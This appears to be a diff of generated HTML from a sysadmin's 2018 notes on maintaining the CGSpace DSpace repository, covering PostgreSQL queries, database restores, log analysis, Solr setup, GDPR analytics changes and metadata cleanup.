<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/89347', '10568/88229', '10568/53086', '10568/53085', '10568/69069', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/70150', '10568/53093', '10568/64874', '10568/53094'))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/89347&#39;, &#39;10568/88229&#39;, &#39;10568/53086&#39;, &#39;10568/53085&#39;, &#39;10568/69069&#39;, &#39;10568/53087&#39;, &#39;10568/53088&#39;, &#39;10568/53089&#39;, &#39;10568/53090&#39;, &#39;10568/53091&#39;, &#39;10568/53092&#39;, &#39;10568/70150&#39;, &#39;10568/53093&#39;, &#39;10568/64874&#39;, &#39;10568/53094&#39;))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
</code></pre><h2 id="2018-04-19">2018-04-19</h2>
<ul>
<li>Run updates on DSpace Test (linode19) and reboot the server</li>
@ -460,17 +460,17 @@ sys 2m2.687s
</code></pre><ul>
<li>And there have been shit tons of errors in the DSpace log (starting only 20 minutes ago, luckily):</li>
</ul>
<pre tabindex="0"><code># grep -c 'org.apache.tomcat.jdbc.pool.PoolExhaustedException' /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.PoolExhaustedException&#39; /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
32147
</code></pre><ul>
<li>I can&rsquo;t even log into PostgreSQL as the <code>postgres</code> user, WTF?</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
^C
</code></pre><ul>
<li>Here are the most active IPs today:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Apr/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Apr/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
917 207.46.13.182
935 213.55.99.121
970 40.77.167.134
@ -484,11 +484,11 @@ sys 2m2.687s
</code></pre><ul>
<li>It doesn&rsquo;t even seem like there is a lot of traffic compared to the previous days:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Apr/2018&quot; | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Apr/2018&#34; | wc -l
74931
# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E &quot;19/Apr/2018&quot; | wc -l
# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E &#34;19/Apr/2018&#34; | wc -l
91073
# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E &quot;18/Apr/2018&quot; | wc -l
# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E &#34;18/Apr/2018&#34; | wc -l
93459
</code></pre><ul>
<li>I tried to restart Tomcat but <code>systemctl</code> hangs</li>
@ -543,7 +543,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [localhost-startStop-2] Time
<li>One other new thing I notice is that PostgreSQL 9.6 no longer uses <code>createuser</code> and <code>nocreateuser</code>, as those have actually meant <code>superuser</code> and <code>nosuperuser</code> and have been deprecated for <em>ten years</em></li>
<li>So for my notes: when importing a CGSpace database dump I need to give the user superuser permission, rather than create the user:</li>
</ul>
<pre tabindex="0"><code>$ psql dspacetest -c 'alter user dspacetest superuser;'
<pre tabindex="0"><code>$ psql dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-18.backup
</code></pre><ul>
<li>There&rsquo;s another issue with Tomcat in Ubuntu 18.04:</li>

View File

@ -38,7 +38,7 @@ http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
Then I reduced the JVM heap size from 6144 back to 5120m
Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -218,7 +218,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<li>I found some more IITA records that Sisay imported on 2018-03-23 that have invalid CRP names, so now I kinda want to check those ones!</li>
<li>Combine the ORCID identifiers Abenet sent with our existing list and resolve their names using the <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2018-05-06-combined.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2018-05-06-combined.txt
$ ./resolve-orcids.py -i /tmp/2018-05-06-combined.txt -o /tmp/2018-05-06-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -242,12 +242,12 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I could use it with <a href="https://github.com/okfn/reconcile-csv">reconcile-csv</a> or to populate a Solr instance for reconciliation</li>
<li>This XPath expression gets close, but outputs all items on one line:</li>
</ul>
<pre tabindex="0"><code>$ xmllint --xpath '//value-pairs[@value-pairs-name=&quot;crpsubject&quot;]/pair/stored-value/node()' dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xmllint --xpath &#39;//value-pairs[@value-pairs-name=&#34;crpsubject&#34;]/pair/stored-value/node()&#39; dspace/config/input-forms.xml
Agriculture for Nutrition and HealthBig DataClimate Change, Agriculture and Food SecurityExcellence in BreedingFishForests, Trees and AgroforestryGenebanksGrain Legumes and Dryland CerealsLivestockMaizePolicies, Institutions and MarketsRiceRoots, Tubers and BananasWater, Land and EcosystemsWheatAquatic Agricultural SystemsDryland CerealsDryland SystemsGrain LegumesIntegrated Systems for the Humid TropicsLivestock and Fish
</code></pre><ul>
<li>Maybe <code>xmlstarlet</code> is better:</li>
</ul>
<pre tabindex="0"><code>$ xmlstarlet sel -t -v '//value-pairs[@value-pairs-name=&quot;crpsubject&quot;]/pair/stored-value/text()' dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xmlstarlet sel -t -v &#39;//value-pairs[@value-pairs-name=&#34;crpsubject&#34;]/pair/stored-value/text()&#39; dspace/config/input-forms.xml
Agriculture for Nutrition and Health
Big Data
Climate Change, Agriculture and Food Security
@ -313,12 +313,12 @@ Livestock and Fish
<pre tabindex="0"><code>import urllib2
import re
pattern = re.compile('.*10.1016.*')
pattern = re.compile(&#39;.*10.1016.*&#39;)
if pattern.match(value):
    get = urllib2.urlopen(value)
    return get.getcode()
return &quot;blank&quot;
return &#34;blank&#34;
</code></pre><ul>
<li>I used a regex to limit it to just some of the DOIs in this case because there were thousands of URLs</li>
<li>Here the response code would be 200, 404, etc, or &ldquo;blank&rdquo; if there is no URL for that item</li>
@ -348,7 +348,7 @@ return &quot;blank&quot;
</ul>
<pre tabindex="0"><code>$ ./bin/solr start
$ ./bin/solr create_core -c countries
$ curl -X POST -H 'Content-type:application/json' --data-binary '{&quot;add-field&quot;: {&quot;name&quot;:&quot;country&quot;, &quot;type&quot;:&quot;text_en&quot;, &quot;multiValued&quot;:false, &quot;stored&quot;:true}}' http://localhost:8983/solr/countries/schema
$ curl -X POST -H &#39;Content-type:application/json&#39; --data-binary &#39;{&#34;add-field&#34;: {&#34;name&#34;:&#34;country&#34;, &#34;type&#34;:&#34;text_en&#34;, &#34;multiValued&#34;:false, &#34;stored&#34;:true}}&#39; http://localhost:8983/solr/countries/schema
$ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
</code></pre><ul>
<li>It still doesn&rsquo;t catch simple mistakes like &ldquo;ALBANI&rdquo; or &ldquo;AL BANIA&rdquo; for &ldquo;ALBANIA&rdquo;, and it doesn&rsquo;t return scores, so I have to select matches manually:</li>
@ -359,7 +359,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
</ul>
<pre tabindex="0"><code>&lt;defaultSearchField&gt;search_text&lt;/defaultSearchField&gt;
...
&lt;copyField source=&quot;*&quot; dest=&quot;search_text&quot;/&gt;
&lt;copyField source=&#34;*&#34; dest=&#34;search_text&#34;/&gt;
</code></pre><ul>
<li>Actually, I wonder how much of their schema I could just copy&hellip;</li>
<li>Apparently the default search field is the <code>df</code> parameter and you could technically just add it to the query string, so no need to bother with that in the schema now</li>
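<li>A sketch of querying the core directly with a fuzzy term and asking for the score, which the lookups above don&rsquo;t surface (the <code>~2</code> edit distance is my assumption):</li>
</ul>
<pre tabindex="0"><code>import requests

def match_country(value):
    # fuzzy term query with up to two edits, and ask Solr for the score;
    # term queries are single-word, so this still won't rescue 'AL BANIA'
    params = {
        'q': f'country:{value}~2',
        'fl': 'country,score',
        'wt': 'json',
    }
    res = requests.get('http://localhost:8983/solr/countries/select', params=params)
    return res.json()['response']['docs']

print(match_country('ALBANI'))  # should surface ALBANIA with a score
</code></pre>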
@ -370,7 +370,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<ul>
<li>Discuss GDPR with James Stapleton
<ul>
<li>As far as I see it, we are &ldquo;Data Controllers&rdquo; on CGSpace because we store peoples' names, emails, and phone numbers if they register</li>
<li>As far as I see it, we are &ldquo;Data Controllers&rdquo; on CGSpace because we store peoples&rsquo; names, emails, and phone numbers if they register</li>
<li>We set cookies on the user&rsquo;s computer, but these do not contain personally identifiable information (PII) and they are &ldquo;session&rdquo; cookies which are deleted when the user closes their browser</li>
<li>We use Google Analytics to track website usage, which makes Google the &ldquo;Data Processor&rdquo; and in this case we merely need to <em>limit</em> or <em>obfuscate</em> the information we send to them</li>
<li>As the only personally identifiable information we send is the user&rsquo;s IP address, I think we only need to enable <a href="https://support.google.com/analytics/answer/2763052">IP Address Anonymization</a> in our <code>analytics.js</code> code snippets</li>
<li>I created and merged a pull request to fix the sorting issue in Listings and Reports (<a href="https://github.com/ilri/DSpace/pull/374">#374</a>)</li>
<li>Regarding the IP Address Anonymization for GDPR, I amended the Google Analytics snippet in <code>page-structure-alterations.xsl</code> to:</li>
</ul>
<pre tabindex="0"><code>ga('send', 'pageview', {
'anonymizeIp': true
<pre tabindex="0"><code>ga(&#39;send&#39;, &#39;pageview&#39;, {
&#39;anonymizeIp&#39;: true
});
</code></pre><ul>
<li>I tested loading a certain page before and after adding this, and afterwards I saw that the parameter <code>aip=1</code> was being sent with the analytics request to Google</li>
</ul>
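<ul>
<li>For reference, the underlying Measurement Protocol hit looks roughly like this sketch (the property ID here is made up), with <code>aip=1</code> appended:</li>
</ul>
<pre tabindex="0"><code>$ curl 'https://www.google-analytics.com/collect?v=1&amp;tid=UA-XXXXXX-1&amp;cid=555&amp;t=pageview&amp;dp=%2Fhandle%2F10568%2F1&amp;aip=1'
</code></pre>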
<ul>
<li>I&rsquo;m investigating how many non-CGIAR users we have registered on CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# select email, netid from eperson where email not like '%cgiar.org%' and email like '%@%';
<pre tabindex="0"><code>dspace=# select email, netid from eperson where email not like &#39;%cgiar.org%&#39; and email like &#39;%@%&#39;;
</code></pre><ul>
<li>We might need to do something regarding these users for GDPR compliance because we have their names, emails, and potentially phone numbers</li>
<li>I decided that I will just use the cookieconsent script as is, since it looks good and technically does set the cookie with &ldquo;allow&rdquo; or &ldquo;dismiss&rdquo;</li>
<li>I generated a list of CIFOR duplicates from the <code>CIFOR_May_9</code> collection using the Atmire MQM module and then dumped the HTML source so I could process it for sending to Vika</li>
<li>I used grep to filter all relevant handle lines from the HTML source then used sed to insert a newline before each &ldquo;Item1&rdquo; line (as the duplicates are grouped like Item1, Item2, Item3 for each set of duplicates):</li>
</ul>
<pre tabindex="0"><code>$ grep -E 'aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item' ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html &gt; ~/cifor-duplicates.txt
$ sed 's/.*Item1.*/\n&amp;/g' ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cleaned.txt
<pre tabindex="0"><code>$ grep -E &#39;aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item&#39; ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html &gt; ~/cifor-duplicates.txt
$ sed &#39;s/.*Item1.*/\n&amp;/g&#39; ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cleaned.txt
</code></pre><ul>
<li>I told Vika to look through the list manually and indicate which ones are indeed duplicates that we should delete, and which ones to map to CIFOR&rsquo;s collection</li>
<li>A few weeks ago Peter wanted a list of authors from the ILRI collections, so I need to find a way to get the handles of all those collections</li>
</ul>
<pre tabindex="0"><code>...
</code></pre><ul>
<li>Then I format the list of handles and put it into this SQL query to export authors from items ONLY in those collections (too many to list here):</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/67236','10568/67274',...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/67236&#39;,&#39;10568/67274&#39;,...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
</code></pre><h2 id="2018-05-31">2018-05-31</h2>
<ul>
<li>Clarify CGSpace&rsquo;s usage of Google Analytics and personally identifiable information during user registration for Bioversity team who had been asking about GDPR compliance</li>
</ul>
<pre tabindex="0"><code>$ docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.5-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ pg_restore -h localhost -O -U dspacetest -d dspacetest -W -h localhost ~/Downloads/cgspace_2018-05-30.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest
</code></pre>

View File

<ul>
<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
</code></pre><ul>
<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
<li>Time to index ~70,000 items on CGSpace:</li>
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b

real    74m42.646s
user    8m5.056s
sys     2m7.289s
</code></pre><ul>
<li>Institut National des Recherches Agricoles du Bénin</li>
<li>Centre de Coopération Internationale en Recherche Agronomique pour le Développement</li>
<li>Institut des Recherches Agricoles du Bénin</li>
<li>Institut des Savannes, Côte d&rsquo;Ivoire</li>
<li>Institut für Pflanzenpathologie und Pflanzenschutz der Universität, Germany</li>
<li>Projet de Gestion des Ressources Naturelles, Bénin</li>
<li>Universität Hannover</li>
<li>I uploaded fixes for all those now, but I will continue with the rest of the data later</li>
<li>Regarding the SQL migration errors, Atmire told me I need to run some migrations manually in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>delete from schema_version where version = '5.6.2015.12.03.2';
update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015.12.03.3';
<pre tabindex="0"><code>delete from schema_version where version = &#39;5.6.2015.12.03.2&#39;;
update schema_version set version = &#39;5.6.2015.12.03.2&#39; where version = &#39;5.5.2015.12.03.2&#39;;
update schema_version set version = &#39;5.8.2015.12.03.3&#39; where version = &#39;5.5.2015.12.03.3&#39;;
</code></pre><ul>
<li>And then I need to run the ignored ones:</li>
</ul>
<pre tabindex="0"><code>$ dspace database migrate ignored
</code></pre><ul>
<li>Gabriela from CIP got back to me about the author names we were correcting on CGSpace</li>
<li>I did a quick sanity check on them and then did a test import with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897"><code>fix-metadata-value.py</code></a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
</code></pre><ul>
<li>I will apply them on CGSpace tomorrow I think&hellip;</li>
</ul>
<ul>
<li>After removing all code mentioning MQM, mqm, metadata-quality, batchedit, duplicatechecker, etc, I think I got most of it removed, but there is a Spring error during Tomcat startup:</li>
</ul>
<pre tabindex="0"><code> INFO [org.dspace.servicemanager.DSpaceServiceManager] Shutdown DSpace core service manager
Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0' defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name 'itemCollectionPlugin' defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
</code></pre><ul>
<li>I can fix this by commenting out the <code>ItemCollectionPlugin</code> line of <code>discovery.xml</code>, but from looking at the git log I&rsquo;m not actually sure if that is related to MQM or not</li>
<li>I will have to ask Atmire</li>
</ul>
<ul>
<li>Looking for corrupted characters in IITA&rsquo;s abstracts with a custom text facet in OpenRefine:</li>
</ul>
<pre tabindex="0"><code>or(
  value.contains('€'),
  value.contains('6g'),
  value.contains('6m'),
  value.contains('6d'),
  value.contains('6e')
)
</code></pre><ul>
<li>So IITA should double check the abstracts for these:
</li>
</ul>
<ul>
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Robin Buruchara&rsquo;s items</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The contents of <code>2018-06-13-Robin-Buruchara.csv</code> were:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Buruchara, Robin&quot;,Robin Buruchara: 0000-0003-0934-1218
&quot;Buruchara, Robin A.&quot;,Robin Buruchara: 0000-0003-0934-1218
</code></pre><ul>
<li>On a hunch I checked to see if CGSpace&rsquo;s bitstream cleanup was working properly and of course it&rsquo;s broken:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(152402) is still referenced from table &quot;bundle&quot;.
</code></pre><ul>
<li>As always, the solution is to delete that ID manually in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (152402);&#39;
UPDATE 1
</code></pre><h2 id="2018-06-14">2018-06-14</h2>
<ul>
<li>Import a fresh snapshot of the CGSpace database into my local development environment:</li>
</ul>
<pre tabindex="0"><code>$ dropdb -h localhost -U postgres dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost /tmp/cgspace_2018-06-24.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
</code></pre><ul>
<li>The <code>-O</code> option to <code>pg_restore</code> makes the import process ignore ownership specified in the dump itself, and instead makes the schema owned by the user doing the restore</li>
<li>I always prefer to use the <code>postgres</code> user locally because it&rsquo;s just easier than remembering the <code>dspacetest</code> user&rsquo;s password, but then I couldn&rsquo;t figure out why the resulting schema was owned by <code>postgres</code></li>
</ul>
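<ul>
<li>A quick way to double check the resulting ownership (just a sketch) is to list the tables along with their owners:</li>
</ul>
<pre tabindex="0"><code>$ psql -h localhost -U postgres dspacetest -c '\dt'
</code></pre>
<ul>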
<li>So I need to make sure to run the following during the DSpace 5.8 upgrade:</li>
</ul>
<pre tabindex="0"><code>-- Delete existing CUA 4 migration if it exists
delete from schema_version where version = '5.6.2015.12.03.2';
-- Update version of CUA 4 migration
update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
-- Delete MQM migration since we're no longer using it
delete from schema_version where version = '5.5.2015.12.03.3';
</code></pre><ul>
<li>After that you can run the migrations manually and then DSpace should work fine:</li>
</ul>
<pre tabindex="0"><code>$ dspace database migrate ignored
...
Done.
</code></pre><ul>
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Andy Jarvis&rsquo; items on CGSpace</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-24-andy-jarvis-orcid.csv -db dspacetest -u dspacetest -p &#39;fuuu&#39;
</code></pre><ul>
<li>The contents of <code>2018-06-24-andy-jarvis-orcid.csv</code> were:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Jarvis, A.&quot;,Andy Jarvis: 0000-0001-6543-0798
&quot;Jarvis, Andy&quot;,Andy Jarvis: 0000-0001-6543-0798
&quot;Jarvis, Andrew&quot;,Andy Jarvis: 0000-0001-6543-0798
</code></pre><h2 id="2018-06-26">2018-06-26</h2>
<ul>
<li>Atmire got back to me to say that we can remove the <code>itemCollectionPlugin</code> and <code>HasBitstreamsSSIPlugin</code> beans from DSpace&rsquo;s <code>discovery.xml</code> file, as they are used by the Metadata Quality Module (MQM) that we are not using anymore</li>
<li>I&rsquo;ll have to figure out how to separate those we&rsquo;re keeping, deleting, and mapping into CIFOR&rsquo;s archive collection</li>
<li>First, get the 62 deletes from Vika&rsquo;s file and remove them from the collection:</li>
</ul>
<pre tabindex="0"><code>$ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' &gt; cifor-handle-to-delete.txt
<pre tabindex="0"><code>$ grep delete 2018-06-22-cifor-duplicates.txt | grep -o -E &#39;[0-9]{5}\/[0-9]{5}&#39; &gt; cifor-handle-to-delete.txt
$ wc -l cifor-handle-to-delete.txt
62 cifor-handle-to-delete.txt
$ wc -l 10568-92904.csv
2461 10568-92904.csv
$ while read line; do sed -i &quot;\#$line#d&quot; 10568-92904.csv; done &lt; cifor-handle-to-delete.txt
$ wc -l 10568-92904.csv
2399 10568-92904.csv
</code></pre><ul>
<li>This iterates over the handles for deletion and uses <code>sed</code> with an alternative pattern delimiter of &lsquo;#&rsquo; (which must be escaped), because the pattern itself contains a &lsquo;/&rsquo;</li>
<li>The mapped ones will be difficult because we need their internal IDs in order to map them, and there are 50 of them:</li>
</ul>
<pre tabindex="0"><code>$ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E '[0-9]{5}\/[0-9]{5}' &gt; cifor-handle-to-map.txt
<pre tabindex="0"><code>$ grep map 2018-06-22-cifor-duplicates.txt | grep -o -E &#39;[0-9]{5}\/[0-9]{5}&#39; &gt; cifor-handle-to-map.txt
$ wc -l cifor-handle-to-map.txt
50 cifor-handle-to-map.txt
</code></pre><ul>
<li>Oooh, I can export the items one by one, concatenate them together, remove the headers, and extract the <code>id</code> and <code>collection</code> columns using <a href="https://csvkit.readthedocs.io/">csvkit</a>:</li>
</ul>
<pre tabindex="0"><code>$ while read line; do filename=${line/\//-}.csv; dspace metadata-export -i $line -f $filename; done &lt; /tmp/cifor-handle-to-map.txt
$ sed '/^id/d' 10568-*.csv | csvcut -c 1,2 &gt; map-to-cifor-archive.csv
</code></pre><ul>
<li>Then I can use Open Refine to add the &ldquo;CIFOR Archive&rdquo; collection to the mappings</li>
<li>Importing the 2398 items via <code>dspace metadata-import</code> ends up with a Java garbage collection error, so I think I need to do it in batches of 1,000</li>
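</ul>
<ul>
<li>A rough sketch of one way to batch it (hypothetical file names; it re-attaches the CSV header to each chunk):</li>
</ul>
<pre tabindex="0"><code>$ head -n1 map-to-cifor-archive.csv &gt; /tmp/header.csv
$ tail -n +2 map-to-cifor-archive.csv | split -l 1000 - /tmp/cifor-chunk-
$ for chunk in /tmp/cifor-chunk-*; do cat /tmp/header.csv &quot;$chunk&quot; &gt; &quot;${chunk}.csv&quot;; done
</code></pre>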

View File

<ul>
<li>As the machine only has 8GB of RAM, I reduced the Tomcat memory heap from 5120m to 4096m so I could try to allocate more to the build process:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=dspacetest.cgiar.org -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
</code></pre><ul>
<li>Then I stopped the Tomcat 7 service, ran the ant update, and manually ran the old and ignored SQL migrations:</li>
</ul>
<pre tabindex="0"><code>$ dspace database migrate ignored
</code></pre>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive.csv
$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/2018-06-27-New-CIFOR-Archive2.csv
</code></pre><ul>
<li>I noticed there are many items that use HTTP instead of HTTPS for their Google Books URL, and some missing HTTP entirely:</li>
</ul>
<pre tabindex="0"><code>dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like 'http://books.google.%';
<pre tabindex="0"><code>dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value like &#39;http://books.google.%&#39;;
count
-------
785
dspace=# select count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=222 and text_value ~ '^books\.google\..*';
count
-------
4
